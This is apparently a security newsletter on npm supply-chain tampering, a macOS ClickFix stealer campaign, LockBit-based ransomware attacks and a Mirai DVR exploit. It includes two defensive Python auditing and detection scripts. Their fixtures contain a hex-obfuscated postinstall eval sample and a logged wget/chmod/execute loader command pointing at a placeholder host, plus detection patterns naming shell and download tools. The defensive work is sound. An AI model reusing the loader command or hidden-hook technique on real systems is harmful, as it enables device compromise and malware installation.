MALWARE ACTIVITY
Rising Tide of Supply Chain and Social Engineering Attacks in Cybersecurity
Recent incidents underscore the escalating risk from software supply chains and from social engineering. A supply chain attack compromised Gluestack's NPM packages, which are downloaded nearly a million times a week. Attackers injected malicious code that enables data theft, remote access, and continued malware deployment on any system that installs the tampered versions. Researchers also found further malware within these packages, including backdoors and destructive payloads, highlighting the need for vigilant package management (pinning versions, reviewing lockfile changes, auditing install scripts) and swift remediation. Concurrently, a campaign using the ClickFix social engineering technique has targeted macOS users. The operators host fake web pages that impersonate trusted services such as Spectrum and present a bogus verification step that tricks victims into copying a shell command and running it in Terminal, which installs an information stealer (the Atomic macOS Stealer, per the linked report) and a remote access trojan (RAT). The attacks, attributed to Russian-speaking threat actors, exploit users' trust and their habit of clicking through routine verification prompts. Collectively, these incidents show why organizations and individuals need comprehensive security practices, including review of third-party code, vigilant monitoring, and user awareness, to defend against increasingly sophisticated adversaries. CTIX analysts will continue to report on the latest malware strains and attack methodologies.
- BleepingComputer: Supply Chain Attack Hits Gluestack NPM Packages
- TheHackerNews: New Supply Chain Malware Operation Hits NPM and PyPI
- TheHackerNews: New Atomic MacOS Stealer Campaign
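As an added example, not code from Gluestack or from the cited reports, the following Python script audits an installed node_modules tree for two of the tell-tales that this kind of package tampering leaves behind: lifecycle install hooks (preinstall/install/postinstall/prepare) and package code that evals strings, spawns processes, opens raw sockets, or embeds long hex or base64 blobs. The fixture it builds (a clean package and a hypothetical tampered one named @acme/ui-kit) is constructed for the demonstration; the patterns are triage heuristics, not proof of compromise.

```python
"""Audit an installed node_modules tree for the kinds of tampering seen in
npm supply-chain compromises: lifecycle install hooks and obfuscated or
remote-access code dropped into package entry points.
Added example; heuristics only, every hit needs a human look."""
import json
import re
import tempfile
from pathlib import Path

# Any one of these is a reason to open the package and read the code.
SUSPICIOUS_PATTERNS = {
    "eval_or_function_ctor": re.compile(r"\beval\s*\(|new\s+Function\s*\("),
    "child_process": re.compile(r"require\(\s*['\"]child_process['\"]\s*\)"),
    "long_hex_or_base64_blob": re.compile(
        r"(?:\\x[0-9a-fA-F]{2}){20,}|[A-Za-z0-9+/]{200,}={0,2}"),
    "raw_socket": re.compile(r"require\(\s*['\"](?:net|tls|dgram)['\"]\s*\)"),
}
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def audit_node_modules(root):
    """Walk node_modules and return a list of (package name, reason) findings."""
    findings = []
    root = Path(root)
    for pkg_json in root.rglob("package.json"):
        pkg_dir = pkg_json.parent
        rel = pkg_dir.relative_to(root).as_posix()
        try:
            meta = json.loads(pkg_json.read_text(encoding="utf-8"))
        except (json.JSONDecodeError, UnicodeDecodeError):
            findings.append((rel, "unparseable package.json"))
            continue
        name = meta.get("name", rel)
        scripts = meta.get("scripts", {}) or {}
        for hook in INSTALL_HOOKS:
            if hook in scripts:
                findings.append((name, f"lifecycle hook {hook}: {scripts[hook]!r}"))
        for js in pkg_dir.rglob("*.js"):
            if "node_modules" in js.relative_to(pkg_dir).parts:
                continue  # nested dependencies get their own package.json pass
            try:
                text = js.read_text(encoding="utf-8", errors="ignore")
            except OSError:
                continue
            for label, pattern in SUSPICIOUS_PATTERNS.items():
                if pattern.search(text):
                    findings.append(
                        (name, f"{label} in {js.relative_to(pkg_dir).as_posix()}"))
    return findings


def build_demo_tree():
    """Constructed fixture (hypothetical packages, not real contents): one clean
    package and one carrying a postinstall hook plus an eval'd hex-encoded blob."""
    root = Path(tempfile.mkdtemp()) / "node_modules"
    clean = root / "left-pad-ish"
    clean.mkdir(parents=True)
    (clean / "package.json").write_text(
        json.dumps({"name": "left-pad-ish", "version": "1.0.0"}))
    (clean / "index.js").write_text("module.exports = s => s.padStart(10);\n")

    bad = root / "@acme" / "ui-kit"
    bad.mkdir(parents=True)
    (bad / "package.json").write_text(json.dumps({
        "name": "@acme/ui-kit", "version": "2.3.1",
        "scripts": {"postinstall": "node lib/setup.js"}}))
    (bad / "lib").mkdir()
    # Hex-escape the real payload so a plain grep for child_process misses it.
    blob = "".join(f"\\x{b:02x}" for b in b"require('child_process').exec('id')")
    (bad / "lib" / "setup.js").write_text(f"eval(\"{blob}\");\n")
    return root


if __name__ == "__main__":
    for pkg, reason in audit_node_modules(build_demo_tree()):
        print(f"{pkg}: {reason}")
```

Run it against a real tree with audit_node_modules("./node_modules"); the hex-escape case in the fixture is why the script looks for escaped blobs and not just for the child_process string.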
THREAT ACTOR ACTIVITY
Hacker Group Using Publicly Leaked LockBit 3.0 Ransomware to Target Russian Companies
DarkGaboon, a financially motivated cybercrime group, has been targeting Russian companies across sectors including banking, retail, tourism, and public services with a series of ransomware attacks. First identified by researchers in January, DarkGaboon's operations trace back to 2023. In its recent spring campaign, DarkGaboon deployed LockBit 3.0 ransomware against Russian victims. This version of LockBit, publicly leaked in 2022, is widely used by cybercriminals, but DarkGaboon operates independently rather than as an affiliate in the ransomware-as-a-service (RaaS) model typical of LockBit operations. DarkGaboon's attacks begin with phishing emails written in Russian that target finance department employees with urgent messages and malicious attachments disguised as legitimate financial documents. The lure documents are based on templates from legitimate Russian-language sources and have remained consistent since 2023. Once inside a victim's network, DarkGaboon encrypts files with LockBit 3.0 and leaves a ransom note in Russian listing contact email addresses. Researchers found no evidence of data exfiltration in the recent incidents. Notably, the email addresses in the ransom notes were linked to earlier LockBit attacks on Russian financial institutions in early 2023. While the individuals behind DarkGaboon remain unidentified, they are believed to be fluent Russian speakers. The group relies on publicly available tooling, including Revenge RAT, XWorm, and the leaked LockBit 3.0 build, to blend in with the broader cybercriminal landscape, which complicates attribution. LockBit variants have previously been used against Russian entities: in December, attackers used it against the largest dairy processing plant in southern Siberia shortly after the company provided humanitarian aid to Russian soldiers in Ukraine, although no specific threat actor has been attributed to that attack.
VULNERABILITIES
Mirai Resurfaces: New Variant Exploits DVR Flaw to Build Stealthier Botnet Army
A newly observed variant of the Mirai botnet is actively exploiting CVE-2024-3721, a command injection vulnerability in TBK DVR-4104 and DVR-4216 digital video recorders, to conscript them into a growing botnet. Originally disclosed by the researcher "netsecfish" in April 2024, the flaw allows attackers to execute shell commands on the device via maliciously crafted POST requests. Kaspersky researchers observed the exploit in their Linux honeypots, where the malware delivers an ARM32 binary without any prior architecture check, a shortcut that works because the targeted DVRs all run on ARM32. Built on Mirai's decade-old source code, the variant adds RC4-encrypted strings with XOR obfuscation, anti-virtualization and anti-emulation checks, and verification of its own execution path to evade detection and analysis. Once infected, devices connect to a command-and-control (C2) server and are used for distributed denial-of-service (DDoS) attacks or to proxy malicious traffic. Although netsecfish originally estimated 114,000 vulnerable devices, Kaspersky found roughly 50,000 still exposed, with infections concentrated in China, India, Egypt, Ukraine, Russia, Turkey, and Brazil. Mitigation is complicated by the fact that these DVR models have been widely rebranded under other names, and it is unclear whether TBK Vision has issued patches. The case shows how quickly threat actors adopt public exploits and why timely updates matter. Device owners and administrators should apply the latest firmware if one is available; where none is, a reboot or factory reset removes the running infection but not the flaw, so the device should also be kept off the public internet (no port forwarding or UPnP exposure of its web interface) to prevent immediate reinfection.
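As an added example, not taken from the page or from Kaspersky's report, the following Python detector flags command-injection attempts of the kind described above in a JSON-lines honeypot or reverse-proxy log. The log format, the endpoint path /cgi-bin/config and the parameter name cmd are hypothetical placeholders rather than the TBK DVR's actual interface, and the sample records are constructed using documentation IP ranges. It URL-decodes every query-string and form parameter (a second pass catches double-encoding), then looks for shell metacharacters and for the wget/chmod/execute staging chain that Mirai-style loaders use to drop their ARM binary.

```python
"""Flag command-injection attempts against embedded web interfaces (DVRs,
routers) by decoding request parameters and looking for shell metacharacters
and Mirai-style loader staging. Added example; log format is constructed."""
import json
import re
from urllib.parse import parse_qsl, unquote_plus

# Command separators and substitution that have no business in a DVR form field.
SHELL_META = re.compile(r"[;|`]|\$\(|&&|\|\|")
# Fetch-then-run chain typical of Mirai loaders: wget/tftp into /tmp, chmod, exec.
STAGING = re.compile(
    r"\b(?:wget|curl|tftp|ftpget|busybox|chmod|nohup)\b|/tmp/|/dev/shm/|/var/run/")

# Constructed sample records (hypothetical endpoint, documentation IP ranges).
SAMPLE_LOG = [
    '{"src":"203.0.113.7","method":"POST","path":"/cgi-bin/login",'
    '"body":"user=admin&pass=admin"}',
    '{"src":"198.51.100.23","method":"POST","path":"/cgi-bin/config",'
    '"body":"cmd=reboot%3B+cd+%2Ftmp%3B+wget+http%3A%2F%2F198.51.100.9%2Farm7'
    '%3B+chmod+777+arm7%3B+.%2Farm7"}',
    '{"src":"198.51.100.23","method":"GET","path":"/cgi-bin/config?cmd=%2524(id)"}',
    '{"src":"192.0.2.5","method":"GET","path":"/status?lang=en"}',
]


def extract_params(record):
    """Merge query-string and form-body parameters into (key, value) pairs."""
    pairs = []
    path = record.get("path", "")
    if "?" in path:
        pairs += parse_qsl(path.split("?", 1)[1], keep_blank_values=True)
    body = record.get("body", "")
    if body:
        pairs += parse_qsl(body, keep_blank_values=True)
    return pairs


def score_value(value):
    """Return (indicator names, decoded value) for one parameter value.
    parse_qsl already decoded once; a second unquote catches %2524-style
    double encoding (at the cost of mangling a literal '+' in benign input)."""
    decoded = unquote_plus(value)
    hits = []
    if SHELL_META.search(decoded):
        hits.append("shell_metachar")
    if STAGING.search(decoded):
        hits.append("loader_staging")
    return hits, decoded


def detect_injection(log_lines):
    """Return one alert dict per parameter that carries injection indicators."""
    alerts = []
    for line in log_lines:
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines rather than crash the pipeline
        for key, value in extract_params(rec):
            hits, decoded = score_value(value)
            if hits:
                alerts.append({
                    "src": rec.get("src"),
                    "method": rec.get("method"),
                    "path": rec.get("path", "").split("?", 1)[0],
                    "param": key,
                    "payload": decoded,
                    "indicators": hits,
                })
    return alerts


if __name__ == "__main__":
    for alert in detect_injection(SAMPLE_LOG):
        print(json.dumps(alert))
```

The double-decoding pass is what catches the third record (%2524 decodes to %24 and then to $), a common trick against naive WAF rules; tune SHELL_META to the device's legitimate parameter vocabulary before deploying on real traffic.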
The content of this article is intended to provide a general guide to the subject matter. Specialist advice should be sought about your specific circumstances.